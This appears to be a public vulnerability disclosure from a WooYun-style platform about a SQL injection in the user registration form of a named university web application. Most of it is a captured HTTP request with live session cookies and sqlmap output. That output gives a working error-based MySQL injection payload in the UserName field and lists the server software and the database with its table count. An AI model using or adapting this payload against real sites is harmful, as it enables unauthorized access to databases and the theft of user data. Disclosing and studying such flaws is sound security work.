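2015-11-26: Details have been reported to the vendor and are awaiting vendor handling
2015-12-01: The vendor has actively ignored the vulnerability; details are disclosed to the public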
POST /User/register HTTP/1.1
Content-Length: 417
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=ur6d70njkgisrrgv92lndmk034; 5meA_2132_saltkey=gIWxwWXa; 5meA_2132_lastvisit=1448286257; 5meA_2132_sid=J40810; 5meA_2132_lastact=1448290356%09member.php%09logging; 5meA_2132_onlineusernum=1; 5meA_2132_home_readfeed=1448289858; 5meA_2132_home_diymode=1; 5meA_2132_st_t=0%7C1448289866%7Cfd10dba8dfd1f5b2410419252ddd0856; 5meA_2132_forum_lastvisit=D_40_1448289859D_37_1448289866; 5meA_2132_visitedfid=47D37D40; 5meA_2132_onlineindex=1; 5meA_2132_st_p=0%7C1448289868%7C92d2799cca5f07555ef9cc62a7d0709b; 5meA_2132_sendmail=1; 5meA_2132__refer=%252Fbbs%252Fhome.php%253Fac%253Dfavorite%2526formhash%253Daa3e4b95%2526handlekey%253Dfavoriteforum%2526id%253D40%2526mod%253Dspacecp%2526type%253Dforum; 5meA_2132_connect_not_sync_feed=1; 5meA_2132_connect_not_sync_t=1; 5meA_2132_viewid=tid_21; thinkphp_show_page_trace=0|0; _ga=GA1.3.924220299.1448263039; _gat=1; bdshare_firstime=1448263038771; BAIDUID=B08E9B04CCAA921EF53A517D9B444291:FG=1; 5meA_2132_atarget=1
Host: info.app.tju.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

ConfirmPassword=g00dPa%24%24w0rD&Email=sample%40email.tst&Password=g00dPa%24%24w0rD&UserName=11
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: UserName (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: ConfirmPassword=g00dPa$$w0rD&Email=sample@email.tst&Password=g00dPa$$w0rD&UserName=11') AND (SELECT 2874 FROM(SELECT COUNT(*),CONCAT(0x7170627871,(SELECT (ELT(2874=2874,1))),0x716a6a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('wnQP'='wnQP
---
web server operating system: Linux CentOS 6.5
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0
Database: info
[343 tables]
Severity: No impact (ignored by vendor)
Ignored at: 2015-12-01 16:56
Vulnerability Rank: 4 (WooYun assessment)
None yet